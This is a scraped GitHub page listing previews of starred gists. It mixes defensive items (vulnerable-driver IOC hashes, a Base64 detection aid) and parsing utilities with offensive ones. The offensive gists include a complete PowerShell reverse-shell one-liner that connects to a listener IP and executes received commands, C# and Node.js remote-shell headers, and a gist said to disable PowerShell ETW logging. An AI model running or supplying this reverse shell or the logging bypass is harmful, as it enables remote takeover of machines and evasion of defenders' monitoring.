Skip to content

Instantly share code, notes, and snippets.

View GetRektBoy724's full-sized avatar
goofy ahh

Hannn GetRektBoy724

goofy ahh
  • Indonesia
View GitHub Profile
k4nfr3 / ioc_vulnerable_drivers.csv
Last active March 28, 2024 07:43
IOC vulnerable drivers
We can make this file beautiful and searchable if this error is corrected: It looks like row 9 should actually have 4 columns, instead of 2 in line 8.
04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,""", Inc.""",DriverAgent Direct I/O for 64-bit Windows
4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,""", Inc""",DriverAgent Direct I/O for 64-bit Windows
B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,""", Inc.""",DriverAgent Direct I/O for 64-bit Windows
7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
MircoBabin / ReadingPortableExecutable_PE_header.cs
Last active June 3, 2021 13:02 — forked from augustoproiete/ReadingPortableExecutable_PE_header.cs
Reading the Portable Executable (PE) header in C# - reading Import Directory Table to e.g. determine Microsoft VC Runtime version
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace peheader
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
class Program
static void Main(string[] args)
Neo23x0 /
Last active August 26, 2024 21:26
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" <. Often used by Emotet (UTF-16)
nathan130200 / MessageBox.cs
Created July 14, 2019 18:39
C# user32.dll MessageBox Raw implementation without System.Windows.Forms (based on
namespace User32
public static class MessageBox
static extern int MessageBoxA(IntPtr hWnd,
string lpText,
string lpCaption,
uint uType);
BankSecurity / Simple_Rev_Shell.cs
Last active September 9, 2024 14:46
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namazso / pdb_parser_lite.cpp
Created April 18, 2018 17:49
A lightweight PDB parser that retrieves type and symbol CodeView streams.
/* MIT License
* Copyright (c) namazso 2018
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
ohpe / RS.ps1
Last active August 25, 2021 01:57
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
tandasat / KillETW.ps1
Last active March 15, 2024 05:20
Disable ETW of the current PowerShell session
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
roccomuso / Client.js
Last active February 19, 2023 21:19
Node.js remote shell example
var net = require('net')
var readline = require('readline')
* @class Client
* @param host {String} the host
* @param post {Integer} the port
function Client (host, port) { = host